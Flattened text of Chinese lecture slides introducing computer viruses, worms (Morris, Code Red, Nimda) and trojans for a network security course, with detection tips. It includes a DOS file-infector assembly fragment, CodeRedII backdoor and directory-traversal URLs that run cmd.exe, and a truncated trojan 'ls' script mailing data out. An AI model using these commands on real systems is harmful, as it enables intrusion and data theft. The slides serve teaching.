計(jì)算機(jī)病毒、蠕蟲和特洛伊木馬介紹(網(wǎng)絡(luò)安全基礎(chǔ)課講義).ppt

《計(jì)算機(jī)病毒、蠕蟲和特洛伊木馬介紹(網(wǎng)絡(luò)安全基礎(chǔ)課講義).ppt》由會(huì)員分享，可在線閱讀，更多相關(guān)《計(jì)算機(jī)病毒、蠕蟲和特洛伊木馬介紹(網(wǎng)絡(luò)安全基礎(chǔ)課講義).ppt（44頁(yè)珍藏版）》請(qǐng)?jiān)谘b配圖網(wǎng)上搜索。

計(jì)算機(jī)病毒、蠕蟲和特洛伊木馬,,提綱,計(jì)算機(jī)病毒網(wǎng)絡(luò)蠕蟲特洛伊木馬,計(jì)算機(jī)病毒,病毒結(jié)構(gòu)模型病毒的分類引導(dǎo)型病毒文件型病毒宏病毒病毒舉例病毒防范,計(jì)算機(jī)病毒的結(jié)構(gòu),傳染條件判斷,傳染代碼,表現(xiàn)及破壞條件判斷,破壞代碼,傳染模塊,表現(xiàn)模塊,計(jì)算機(jī)病毒的分類,按攻擊平臺(tái)分類：DOS,Win32，MAC，Unix按危害分類：良性、惡性按代碼形式：源碼、中間代碼、目標(biāo)碼按宿主分類：引導(dǎo)型主引導(dǎo)區(qū)操作系統(tǒng)引導(dǎo)區(qū)文件型操作系統(tǒng)應(yīng)用程序宏病毒,引導(dǎo)型病毒—引導(dǎo)記錄,主引導(dǎo)記錄（MBR）,A,引導(dǎo)型病毒——系統(tǒng)引導(dǎo)過(guò)程,PowerOn,CPUsetuptofindafileINT21;findthehostfileMOVAX,3D02;setuptoopenthehostfileINT21;openhostfileMOVAH,40;setuptowritefiletodiskINT21;writetofileDB*.COM;whatfilestolookfor,宏病毒（MacroVirus）,歷史：1980年，Dr.FredrickCohenandRalfBurger論文1994年，MicrosoftWord第一例宏病毒W(wǎng)ord,Excel,Access,PowerPoint,Project,LotusAmiPro,Visio,Lotus1-2-3,AutoCAD,CorelDraw.使用數(shù)據(jù)文件進(jìn)行傳播，使得反病毒軟件不再只關(guān)注可執(zhí)行文件和引導(dǎo)區(qū)DOEViRT統(tǒng)計(jì)，85%的病毒感染歸因于宏病毒易于編寫，只需要一兩天的時(shí)間，10－15行代碼大量的用戶：90MillionMSOfficeUsers人們通常不交換程序，而交換數(shù)據(jù),宏病毒工作機(jī)理,,有毒文件.doc,Normal.dot,無(wú)毒文件.doc,Normal.dot,注意事項(xiàng),Macro可以存在模板里，也可以存在文檔里RTF文件也可以包含宏病毒通過(guò)IE瀏覽器可以直接打開，而不提示下載,提綱,計(jì)算機(jī)病毒網(wǎng)絡(luò)蠕蟲特洛伊木馬,蠕蟲（Worm）,一個(gè)獨(dú)立的計(jì)算機(jī)程序，不需要宿主自我復(fù)制，自主傳播（Mobile）占用系統(tǒng)或網(wǎng)絡(luò)資源、破壞其他程序不偽裝成其他程序，靠自主傳播利用系統(tǒng)漏洞；利用電子郵件（無(wú)需用戶參與）,莫里斯蠕蟲事件,發(fā)生于1988年，當(dāng)時(shí)導(dǎo)致大約6000臺(tái)機(jī)器癱瘓主要的攻擊方法Rsh，rexec：用戶的缺省認(rèn)證Sendmail的debug模式Fingerd的緩沖區(qū)溢出口令猜測(cè),CRI,主要影響WindowsNT系統(tǒng)和Windows2000主要影響國(guó)外網(wǎng)絡(luò)據(jù)CERT統(tǒng)計(jì)，至8月初已經(jīng)感染超過(guò)25萬(wàn)臺(tái)主要行為利用IIS的Index服務(wù)的緩沖區(qū)溢出缺陷進(jìn)入系統(tǒng)檢查c:\notworm文件是否存在以判斷是否感染中文保護(hù)（是中文windows就不修改主頁(yè)）攻擊白宮！,CRII,InspiredbyRCI影響波及全球國(guó)內(nèi)影響尤其廣泛主要行為所利用缺陷相同只感染windows2000系統(tǒng)，由于一些參數(shù)的問(wèn)題，只會(huì)導(dǎo)致NT死機(jī)休眠與掃描：中文windows，600個(gè)線程,Nimda簡(jiǎn)介,影響系統(tǒng)：MSwin9x,wind2k,winXP傳播途徑：Email、文件共享、頁(yè)面瀏覽、MSIIS目錄遍歷、CodeRed后門影響群發(fā)電子郵件，付病毒掃描共享文件夾，掃描有漏洞的IIS,掃描有CodeRed后門的IISServer,紅色代碼病毒,紅色代碼病毒是一種結(jié)合了病毒、木馬、DDOS機(jī)制的蠕蟲。2001年7月中旬，在美國(guó)等地大規(guī)模蔓延。2001年8月初，出現(xiàn)變種coderedII，針對(duì)中文版windows系統(tǒng)，國(guó)內(nèi)大規(guī)模蔓延。通過(guò)80端口傳播。只存在與網(wǎng)絡(luò)服務(wù)器的內(nèi)存，不通過(guò)文件載體。利用IIS緩沖區(qū)溢出漏洞（2001年6月18日發(fā)布）,CodeRedI,在侵入一臺(tái)服務(wù)器后，其運(yùn)行步驟是：設(shè)置運(yùn)行環(huán)境，修改堆棧指針，設(shè)置堆棧大小為218h字節(jié)。接著使用RVA（相對(duì)虛擬地址）查找GetProcAddress的函數(shù)地址，然后就獲得其他socket、connect、send、recv、closesocket等函數(shù)地址；如果C:\notworm在，不再進(jìn)一步傳染；傳染其他主機(jī)。創(chuàng)造100個(gè)線程，其中99個(gè)用戶感染其他WEB服務(wù)器，被攻擊IP通過(guò)一個(gè)算法計(jì)算得出；篡改主頁(yè)，如果系統(tǒng)默認(rèn)語(yǔ)言為“美國(guó)英語(yǔ)”，第100個(gè)進(jìn)程就將這臺(tái)服務(wù)的主頁(yè)改成“Welcometo!,HackedByChinese!”，并持續(xù)10個(gè)小時(shí)。（這個(gè)修改直接在內(nèi)存中修改，而不是修改*.htm文件）；如果時(shí)間在20：00UTC和23：59UTC之間，將反復(fù)和白宮主頁(yè)建立連接，并發(fā)送98k字節(jié)數(shù)據(jù)，形成DDOS攻擊。,CodeRedII,增加了特洛依木馬的功能，并針對(duì)中國(guó)網(wǎng)站做了改進(jìn)計(jì)算IP的方法進(jìn)行了修改，使病毒傳染的更快；檢查是否存在CodeRedII原子，若存在則進(jìn)入睡眠狀態(tài)防止反復(fù)感染，若不存在則創(chuàng)建CodeRedII原子；創(chuàng)建300個(gè)線程進(jìn)行傳染，若系統(tǒng)默認(rèn)語(yǔ)言為簡(jiǎn)體中文或繁體中文，則創(chuàng)建600個(gè)線程；檢查時(shí)間。病毒作者的意圖是傳播過(guò)程在2001年10月1日完成，之后，蠕蟲會(huì)爆發(fā)而使系統(tǒng)不斷重新啟動(dòng)。在系統(tǒng)中安裝一個(gè)特洛依木馬：拷貝系統(tǒng)目錄cmd.exe到IIS的腳本執(zhí)行目錄下，改名為root.exe；將病毒體內(nèi)的木馬解壓縮寫到C盤和D盤的explorer.exe木馬每次系統(tǒng)和啟動(dòng)都會(huì)運(yùn)行，禁止系統(tǒng)的文件保護(hù)功能，并將C盤和D盤通過(guò)web服務(wù)器共享,CodeRedII,攻擊形式http://x.x.x.x/c/inetpub/scripts/root.exe?/c+dirhttp://x.x.x.x/c/winnt/system32/cmd.exe?/c+dir其中x.x.x.x是被攻擊的IP地址，dir可以是任意命令，比如刪除系統(tǒng)中的文件，向外發(fā)送機(jī)密數(shù)據(jù)等，這個(gè)后門后來(lái)也成為了nimda病毒的一個(gè)傳播模式。下面是cert/cc上提供的被攻擊服務(wù)器日志(CA-2001-11)2001-05-0612:20:1910.10.10.10-10.20.20.2080GET/scripts/../../winnt/system32/cmd.exe/c+dir200–2001-05-0612:20:1910.10.10.10-10.20.20.2080GET/scripts/../../winnt/system32/cmd.exe/c+dir+..\200–,紅色代碼病毒的檢測(cè)和防范,針對(duì)安裝IIS的windows系統(tǒng)；是否出現(xiàn)負(fù)載顯著增加（CPU/網(wǎng)絡(luò)）的現(xiàn)象；用netstat–an檢查是否有許多對(duì)外的80端口連接在web日志中檢查是否有/default.ida?xxx..%u0078%u0000％u00=aHTTP/1.0這樣的攻擊記錄；查找系統(tǒng)中是否存在文件c:\explorer.exe或d:\explorer.exe以及root.exe；檢查注冊(cè)表文件中是否增加了C和D虛擬目錄，以及文件保護(hù)功能是否被禁止。在任務(wù)管理器中檢查是否存在兩個(gè)explorer.exe進(jìn)程。,提綱,計(jì)算機(jī)病毒網(wǎng)絡(luò)蠕蟲特洛伊木馬,特洛伊木馬,名字來(lái)源：古希臘故事通過(guò)偽裝成其他程序、有意隱藏自己惡意行為的程序，通常留下一個(gè)遠(yuǎn)程控制的后門沒(méi)有自我復(fù)制的功能非自主傳播用戶主動(dòng)發(fā)送給其他人放到網(wǎng)站上由用戶下載,最簡(jiǎn)單的木馬舉例,ls#!/bin/sh/bin/mailmyaddress@

配套講稿：

如PPT文件的首頁(yè)顯示word圖標(biāo)，表示該P(yáng)PT已包含配套word講稿。雙擊word圖標(biāo)可打開word文檔。

特殊限制：

部分文檔作品中含有的國(guó)旗、國(guó)徽等圖片，僅作為作品整體效果示例展示，禁止商用。設(shè)計(jì)者僅對(duì)作品中獨(dú)創(chuàng)性部分享有著作權(quán)。

關(guān) 鍵  詞：

計(jì)算機(jī)病毒 蠕蟲 特洛伊木馬 介紹 網(wǎng)絡(luò)安全 基礎(chǔ)課 講義